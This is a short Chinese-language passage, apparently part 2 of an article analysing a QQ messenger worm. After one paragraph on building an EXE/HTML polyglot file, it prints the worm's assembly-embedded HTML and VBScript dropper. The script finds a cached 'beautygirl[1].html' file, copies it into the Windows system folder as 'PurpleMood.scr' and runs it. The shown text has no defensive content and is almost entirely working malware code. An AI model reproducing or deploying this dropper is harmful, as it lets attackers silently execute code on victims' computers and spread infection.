QQ蠕虫病毒原理分析与防御(2)

　　把exe和html硬编码到一个文件，就相当于将exe文件指针移动到末尾，然后将html文件写到exe之后。这样，当文件扩展名是exe时，就执行exe(因为文件确实是PE结构),扩展名是html时，就当作html解释，此时exe内容就是乱码，显示在ie窗口之中。如下：

　　db　'<HTML><HEAD><TITLE>hi</TITLE>'
　　　　db　'<SCRIPT LANGUAGE="VBScript">'
　　　　db　'<!--',0dh,0ah
　　　　db　'Set fso = CreateObject("Scripting.FileSystemObject")',0dh,0ah
　　　　db　'sf=fso.GetSpecialFolder(1)',0dh,0ah
　　　　db　'sf=sf & "\PurpleMood.scr"',0dh,0ah
　　　　db　'tif=fso.GetSpecialFolder(2)',0dh,0ah
　　　　db　'tif=Left(tif , Len(tif)-4)',0dh,0ah
　　　　db　'tif=tif & "Temporary Internet Files\Content.IE5"',0dh,0ah
　　　　db　'Set tif = FSO.GetFolder(tif)',0dh,0ah
　　　　db　'GenerateAllFolderInformation(tif)',0dh,0ah
　　　　db　'Set WshShell = CreateObject("WScript.Shell")',0dh,0ah
　　　　db　'WshShell.Exec(sf)',0dh,0ah
　　　　db　'Function GenerateFolderInformation(Folder)',0dh,0ah
　　　　db　'Set Files = Folder.Files',0dh,0ah
　　　　db　'For Each File In Files',0dh,0ah
　　　　db　'if StrComp("beautygirl[1].html",File.Name,1) = 0 Then',0dh,0ah
　　　　db　'fso.CopyFile File.path,sf',0dh,0ah
　　　　db　'End if',0dh,0ah
　　　　db　'Next',0dh,0ah
　　　　db　'End Function',0dh,0ah
　　　　db　'Function GenerateAllFolderInformation(Folder)',0dh,0ah　　　
　　　　db　'Set SubFolders = Folder.SubFolders',0dh,0ah
　　　　db　'For Each SubFolder In SubFolders',0dh,0ah
　　　　db　'GenerateFolderInformation(SubFolder)',0dh,0ah
　　　　db　'Next',0dh,0ah
　　　　db　'End Function',0dh,0ah
　　　　db　'-->'
　　　　db　'</SCRIPT></HEAD><BODY>Thank you for test it!</BODY></HTML>'